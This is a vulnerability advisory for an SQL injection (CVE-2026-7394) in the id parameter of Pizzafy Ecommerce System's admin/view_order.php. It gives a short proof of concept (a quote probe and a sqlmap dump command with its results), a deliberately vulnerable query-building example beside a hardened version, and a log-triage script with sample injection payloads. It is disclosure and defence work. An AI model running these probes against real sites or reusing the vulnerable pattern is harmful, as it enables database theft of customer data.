| Title | Published | Source |
|---|---|---|
| CVE-2026-7394 | 29 Apr 2026 17:15 | attackerkb |
| SourceCodester Pizzafy Ecommerce System injection vulnerability | 29 Apr 2026 00:00 | cnnvd |
| CVE-2026-7394 | 29 Apr 2026 17:15 | cve |
| CVE-2026-7394 SourceCodester Pizzafy Ecommerce System GET Parameter view_order.php sql injection | 29 Apr 2026 17:15 | cvelist |
| EUVD-2026-26266 | 29 Apr 2026 17:15 | euvd |
| CVE-2026-7394 | 29 Apr 2026 18:16 | nvd |
| PT-2026-35963 | 29 Apr 2026 00:00 | ptsecurity |
| CVE-2026-7394 SourceCodester Pizzafy Ecommerce System GET Parameter view_order.php sql injection | 29 Apr 2026 17:15 | vulnrichment |
# SQL Injection in Pizzafy Ecommerce System - `admin/view_order.php`
## Details
| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Version** | 1.0 |
| **Vulnerability** | SQL Injection |
| **CWE** | CWE-89 |
| **CVSSv3 Score** | 7.2 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **Researcher** | Xmyronn |
| **Date** | 2026-04-11 |
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
---
## Affected Component
**File:** `Pizzafy/admin/view_order.php`
**Parameter:** `id` (GET)
---
## Description
The `admin/view_order.php` endpoint in Pizzafy Ecommerce System 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading to full database compromise.
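The advisory does not reproduce the source of `view_order.php`, so the following is an added illustration and not the project's code: a hypothetical reconstruction of the vulnerable pattern the description implies, placed beside a hardened handler that validates `id` as a positive integer, binds it through a mysqli prepared statement, and keeps `mysqli_sql_exception` details (query fragment, file path) out of the HTTP response. The `orders` table, the `$conn` connection, and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the Pizzafy project's code. Assumed: a mysqli connection
// $conn in exception-reporting mode and a table `orders` with an integer `id`.

// Hypothetical reconstruction of the vulnerable pattern the advisory describes:
// the raw GET value is spliced into the SQL text, so id=' breaks the quoting
// and whatever follows is parsed as SQL by the server.
function load_order_vulnerable(mysqli $conn, array $get): ?array
{
    $sql = "SELECT * FROM orders WHERE id = '" . ($get['id'] ?? '') . "'";
    $result = $conn->query($sql);
    return $result->fetch_assoc() ?: null;
}

// Hardened version, step 1: the parameter is an order id, i.e. a positive
// integer; reject everything else before any SQL is built.
function parse_order_id(array $get): ?int
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Step 2: bind the value as a parameter so the SQL text never contains it.
function load_order_safe(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare('SELECT * FROM orders WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Step 3: a mysqli_sql_exception must not reach the client with the query
// fragment and file path; log it server-side and answer with a generic error.
function handle_request(mysqli $conn, array $get): void
{
    $id = parse_order_id($get);
    if ($id === null) {
        http_response_code(400);
        echo 'Invalid order id.';
        return;
    }
    try {
        $order = load_order_safe($conn, $id);
    } catch (mysqli_sql_exception $e) {
        error_log('view_order.php query failed: ' . $e->getMessage());
        http_response_code(500);
        echo 'An internal error occurred.';
        return;
    }
    if ($order === null) {
        http_response_code(404);
        echo 'Order not found.';
        return;
    }
    echo htmlspecialchars((string) json_encode($order), ENT_QUOTES, 'UTF-8');
}

// Usage (connection values are placeholders):
// ini_set('display_errors', '0');
// mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// $conn = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'pizzafy');
// handle_request($conn, $_GET);
```

Validation and parameter binding are independent layers: the integer check rejects the `id='` probe with a 400 before the database is touched, and the prepared statement guarantees that even a value which passes validation can only ever be compared as data. Turning `display_errors` off is what removes the verbose error disclosure shown later in the proof of concept.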
---
## Proof of Concept
### Step 1: Login as Administrator
Navigate to:
```
http://localhost/pizzafy/Pizzafy/admin/index.php
```
Log in with administrator credentials.
### Step 2: Navigate to Orders
```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
```
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212106" src="https://github.com/user-attachments/assets/b415920d-d2c9-42f6-9ecb-0e3579b7e399" />
Click **View Order** on any order entry.
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212116" src="https://github.com/user-attachments/assets/9d8db0fb-a08f-445d-9592-818636531009" />
### Step 3: Intercept Request in Burp Suite
The intercepted GET request looks like:
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212135" src="https://github.com/user-attachments/assets/3149154e-853f-4a88-81dc-be00a209df2f" />
### Step 4: Trigger SQL Error
Modify `id=1` to `id='`:
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212145" src="https://github.com/user-attachments/assets/506ae221-64b0-42e9-a959-ecadfa5029e9" />
```
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
```
**Response (MySQL error exposed):**
```
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
```
### Step 5: Exploit with sqlmap
Save the request to `view_order.txt` and run:
```bash
sqlmap -r view_order.txt --dump --batch
```
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212406" src="https://github.com/user-attachments/assets/438e9b26-4927-462d-b3db-234d77626a84" />
**sqlmap confirmed injection types:**
| Type | Title |
|---|---|
| Boolean-based blind | AND boolean-based blind - WHERE clause |
| Error-based | MySQL >= 5.0 FLOOR error-based |
| Time-based blind | MySQL >= 5.0.12 SLEEP |
| UNION query | Generic UNION query - 11 columns |
**Full database dumped:**
```
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
```
Sensitive data exposed includes bcrypt password hashes, customer emails, order details, and system configuration.
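From the defender's side, the probes above leave a recognisable trace in the web server's access log: a `view_order.php` request whose `id` is not a plain integer, and automated follow-up carrying a sqlmap User-Agent. The following triage script is an added example, not part of the advisory or the Pizzafy project; the log lines it scans are constructed samples in Apache combined format (the sqlmap User-Agent string is also constructed), and the rule names and thresholds are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: access-log triage for the id-parameter probing described in
// the advisory. SAMPLE_LOG is constructed data, not captured traffic.
const SAMPLE_LOG = <<<'LOG'
192.0.2.10 - - [11/Apr/2026:21:21:06 +0000] "GET /pizzafy/Pizzafy/admin/view_order.php?id=1 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.0.2.10 - - [11/Apr/2026:21:21:45 +0000] "GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1" 500 612 "-" "Mozilla/5.0"
192.0.2.10 - - [11/Apr/2026:21:24:06 +0000] "GET /pizzafy/Pizzafy/admin/view_order.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 4120 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
192.0.2.11 - - [11/Apr/2026:21:25:00 +0000] "GET /pizzafy/Pizzafy/admin/index.php?page=orders HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
LOG;

/** Parse one combined-format line into the fields the rules need, or null. */
function parse_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

/**
 * Return the reasons a request looks like probing of the view_order.php id
 * parameter; an empty array means nothing in this request stood out.
 */
function suspicious_reasons(array $req): array
{
    $reasons = [];
    $path  = (string) parse_url($req['target'], PHP_URL_PATH);
    $query = (string) parse_url($req['target'], PHP_URL_QUERY);
    parse_str($query, $params);

    if (str_ends_with($path, '/admin/view_order.php') && isset($params['id'])) {
        // The legitimate id is a positive integer; quotes, keywords or
        // whitespace in it are the signature of an injection probe.
        $valid = filter_var($params['id'], FILTER_VALIDATE_INT,
                            ['options' => ['min_range' => 1]]);
        if ($valid === false) {
            $reasons[] = 'non-integer id=' . $params['id'];
        }
        // A server error on this endpoint is a separate signal worth correlating.
        if ($req['status'] >= 500) {
            $reasons[] = 'server error on view_order.php';
        }
    }
    if (stripos($req['ua'], 'sqlmap') !== false) {
        $reasons[] = 'sqlmap user-agent';
    }
    return $reasons;
}

/** Run the rules over a whole log and return the flagged requests. */
function triage(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parse_line($line);
        if ($req === null) {
            continue;
        }
        $reasons = suspicious_reasons($req);
        if ($reasons !== []) {
            $hits[] = ['ip' => $req['ip'], 'time' => $req['time'], 'reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (triage(SAMPLE_LOG) as $hit) {
    printf("%s %s: %s\n", $hit['time'], $hit['ip'], implode('; ', $hit['reasons']));
}
```

Run against the sample, the two probe lines are flagged (the first for the stray quote and the server error, the second for the `AND SLEEP(5)` payload and the sqlmap User-Agent) while the legitimate `id=1` and `page=orders` requests pass. The integer check is the same rule the hardened handler would enforce at request time, so a hit here also tells you the deployed code is not enforcing it.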
---
## Impact
A malicious authenticated administrator (or attacker who has obtained admin credentials) can:
- Dump the full database including password hashes
- Read sensitive customer PII (names, emails, addresses, phone numbers)
- Potentially write to the database
---
## References
- [SourceCodester â Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')